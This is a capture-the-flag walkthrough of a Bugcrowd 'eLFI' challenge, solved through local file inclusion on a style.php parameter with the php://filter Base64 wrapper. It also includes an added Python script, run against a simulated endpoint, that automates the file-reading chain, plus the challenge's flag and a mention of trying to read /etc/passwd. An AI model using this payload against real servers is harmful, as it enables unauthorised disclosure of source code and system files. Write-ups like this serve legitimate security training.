Bugcrowd elfi challenge


Bugcrowd has thrown down the gauntlet to all hackers out there.

HINT-1: “I am eLFI.”

  • First, I visited this link: Bugcrowd Advent Challenge.
  • I attempted to log in with `user1` and `Randompassword123` as credentials, which resulted in an internal server error.


  • I tinkered with the login.php page, but no luck.
  • I delved into the source code of `login.php` and found a few interesting lines that caught my attention.


  • I remembered the hint, and these lines of code seemed related.
  • This led me to discover a vulnerable endpoint: `/style.php?css_file=custom.css`.
  • It appeared to filter out `/etc/passwd`, so I attempted URL and Base64 encoding of the path, but no luck.
  • After some more exploration, I noticed another file: `index.php`.
  • When I tried to open it, it redirected me to `login.php`. However, in the network tab, I saw `index.php` with a status code of 302.
  • I felt suspicious about index.php and decided to investigate further:


  • I used `php://filter/convert.base64-encode/resource=<filename>` to bypass the restriction and view the source code of `index.php`: the filter wrapper makes PHP return the file Base64-encoded instead of executing it, so the PHP source is disclosed rather than run.


  • `index.php` revealed an encoded string, which I decoded using CyberChef.


  • After decoding, I found another PHP file: `dashboard.php`. I replaced `index.php` with `dashboard.php` in the `resource=` part of the payload.


  • `dashboard.php` presented another encoded string, which I decoded again.
  • After decoding, I found yet another file: `sober.php`.


  • I replaced `dashboard.php` with `sober.php` and discovered another encoded string in the comments, although smaller than the earlier ones.


  • After decoding, I obtained the flag: `FLAG{d1g_d33p_and_find_7he_power_within}`.

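The whole chain above (read a file through the `php://filter` wrapper, Base64-decode the response, pull the next file name out of a comment, repeat until the flag appears) can be scripted. The following is an added example, not the author's code and not the challenge's own files: the target host, the `fake_style_php` stand-in for the vulnerable endpoint and the `FAKE_FILES` contents are all constructed here so the script runs offline, and the substring deny-list on `/etc/passwd` is an assumption about why the direct read failed.

```python
import base64
import re
from urllib.parse import urlencode

# Hypothetical target; the real challenge host is not reproduced here.
TARGET = "http://challenge.example"
PARAM = "css_file"
FILTER_PREFIX = "php://filter/convert.base64-encode/resource="


def filter_payload(resource: str) -> str:
    """php://filter wrapper: PHP emits the file Base64-encoded instead of
    executing it, so PHP source can be read through the include."""
    return FILTER_PREFIX + resource


def build_url(resource: str) -> str:
    """URL for the vulnerable endpoint with the wrapper payload encoded."""
    return f"{TARGET}/style.php?{urlencode({PARAM: filter_payload(resource)})}"


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed stand-in for the challenge's files: each PHP file hides a
# Base64 string in a comment that names the next file, as in the walkthrough.
FAKE_FILES = {
    "custom.css": "body { color: red; }",
    "index.php": "<?php header('Location: login.php'); exit; ?>\n"
                 "<!-- " + _b64("dashboard.php") + " -->",
    "dashboard.php": "<?php /* " + _b64("sober.php") + " */ ?>",
    "sober.php": "<?php // " + _b64("FLAG{d1g_d33p_and_find_7he_power_within}") + " ?>",
}


def fake_style_php(css_file: str) -> str:
    """Simulated vulnerable endpoint (assumption): a substring deny-list on
    /etc/passwd, otherwise include() of the user-controlled path, which in
    real PHP honours the php://filter wrapper."""
    if "/etc/passwd" in css_file:
        return "Forbidden"
    if css_file.startswith(FILTER_PREFIX):
        name = css_file[len(FILTER_PREFIX):]
        return _b64(FAKE_FILES[name]) if name in FAKE_FILES else ""
    return FAKE_FILES.get(css_file, "")


def decode_source(body: str) -> str:
    """Undo the convert.base64-encode filter to recover the original source."""
    return base64.b64decode(body.strip()).decode()


COMMENT_RE = re.compile(r"<!--(.*?)-->|/\*(.*?)\*/|//([^\n]*)", re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def hidden_strings(source: str) -> list[str]:
    """Decode every Base64-looking token found inside HTML or PHP comments
    that decodes to printable text; anything else is skipped."""
    found = []
    for m in COMMENT_RE.finditer(source):
        comment = "".join(g for g in m.groups() if g)
        for tok in B64_RE.findall(comment):
            try:
                text = base64.b64decode(tok, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if text.isprintable():
                found.append(text)
    return found


def follow_chain(start: str, fetch=fake_style_php, max_hops: int = 10) -> list[str]:
    """Walk the LFI chain from `start`, returning every file visited and,
    if reached, the flag. max_hops guards against a comment loop."""
    trail = []
    current = start
    for _ in range(max_hops):
        trail.append(current)
        source = decode_source(fetch(filter_payload(current)))
        hints = hidden_strings(source)
        if not hints:
            break
        nxt = hints[0]
        if nxt.startswith("FLAG{"):
            trail.append(nxt)
            break
        current = nxt
    return trail


if __name__ == "__main__":
    print(build_url("index.php"))
    for step in follow_chain("index.php"):
        print(step)
```

Against a live target, replace `fake_style_php` with a function that performs the GET on `build_url(resource)` and returns the response body; the rest of the chain logic is unchanged. Note that the wrapper does not defeat the deny-list itself (`resource=/etc/passwd` still contains the blocked substring), which matches the walkthrough: the bypass is for reading PHP files that would otherwise be executed, not for the filtered path.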

I don’t know why, but I was drawn to this challenge and even took some time off work to solve it. Thanks to Bugcrowd for the fun challenge!

The challenge might seem simple after reading this walkthrough, but believe me, it took a lot of brainpower and time to execute.

I’d like to extend my gratitude to my friend, Paweł Wąsik, for his constant support.


Connect with me at: LinkedIn, Twitter

Here’s a link to the next fun klown.cfm 🎪 challenge.

